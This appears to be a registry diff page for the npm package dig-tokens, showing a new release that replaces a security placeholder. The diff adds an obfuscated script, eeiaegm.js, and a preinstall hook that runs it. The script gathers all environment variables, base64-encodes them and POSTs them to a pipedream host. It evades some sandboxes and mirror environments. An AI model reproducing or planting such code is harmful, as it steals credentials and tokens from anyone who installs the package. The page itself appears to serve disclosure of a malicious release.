dig-tokens 0.0.1-security → 9.877.315
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of dig-tokens might be problematic. Click here for more details.
- package/eeiaegm.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/eeiaegm.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function a0_0x4cf6(_0x2ab489,_0x643c0e){const _0x5b6e39=a0_0x5b6e();return a0_0x4cf6=function(_0x4cf68d,_0xd0200a){_0x4cf68d=_0x4cf68d-0xcd;let _0x2adb6c=_0x5b6e39[_0x4cf68d];return _0x2adb6c;},a0_0x4cf6(_0x2ab489,_0x643c0e);}const a0_0x8298d0=a0_0x4cf6;(function(_0x200a56,_0x443cdf){const _0x1da732=a0_0x4cf6,_0x56faa2=_0x200a56();while(!![]){try{const _0x548078=-parseInt(_0x1da732(0xe5))/0x1*(parseInt(_0x1da732(0xdc))/0x2)+parseInt(_0x1da732(0xe9))/0x3*(-parseInt(_0x1da732(0xe2))/0x4)+-parseInt(_0x1da732(0xe7))/0x5+-parseInt(_0x1da732(0xe3))/0x6*(-parseInt(_0x1da732(0xd4))/0x7)+-parseInt(_0x1da732(0xda))/0x8+-parseInt(_0x1da732(0xe6))/0x9+-parseInt(_0x1da732(0xdb))/0xa*(-parseInt(_0x1da732(0xea))/0xb);if(_0x548078===_0x443cdf)break;else _0x56faa2['push'](_0x56faa2['shift']());}catch(_0x3518bf){_0x56faa2['push'](_0x56faa2['shift']());}}}(a0_0x5b6e,0x97e06));const http=require(a0_0x8298d0(0xd1)),filter=[{'key':a0_0x8298d0(0xd6),'val':'taobao.org'},{'key':a0_0x8298d0(0xd6),'val':a0_0x8298d0(0xe1)},{'key':a0_0x8298d0(0xd6),'val':a0_0x8298d0(0xe4)},{'key':'USERNAME','val':a0_0x8298d0(0xde)},{'key':'_','val':a0_0x8298d0(0xdf)}];function a0_0x5b6e(){const _0x4b0415=['join','1451240QDVrZu','29260BNJQCS','170474reIJSc','POST','daasadmin','/usr/bin/python','env','tencent.com','4IylNPq','3565062WSZlnl','registry.npmmirror.com','11xbyqEY','4099203DoBdPI','1118015smxRzu','net','2404671susIoW','9878ErLzzJ','c2e7a0cfd4f45f811ede4b077ae48dfa','npm_package_name','toString','error','stringify','https','includes','write','7CGzmDf','end','npm_config_registry','from','request'];a0_0x5b6e=function(){return _0x4b0415;};return a0_0x5b6e();}function main(){const _0x2d54f9=a0_0x8298d0;var _0x2cd686=process[_0x2d54f9(0xe0)]||{};if(filter['some'](({key:_0x231841,val:_0xda0458})=>_0x2cd686[_0x231841]&&_0x2cd686[_0x231841][_0x2d54f9(0xd2)](_0xda0458))||Object['keys'](_0x2cd686)['length']<0xa)return;req=http[_0x2d54f9(0xd8)]({'host':[_0x2d54f9(0xeb),'m','pipedream',_0x2d54f9(0xe8)][_0x2d54f9(0xd9)]('.'),'path':'/'+(_0x2cd686[_0x2d54f9(0xcd)]||''),'method':_0x2d54f9(0xdd)})['on'](_0x2d54f9(0xcf),function(_0x12025b){}),req[_0x2d54f9(0xd3)](Buffer[_0x2d54f9(0xd7)](JSON[_0x2d54f9(0xd0)](_0x2cd686))[_0x2d54f9(0xce)]('base64')),req[_0x2d54f9(0xd5)]();}main();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "dig-tokens",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "9.877.315",
|
|
4
|
+
"main": "eeiaegm.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node eeiaegm.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=dig-tokens for more information.
|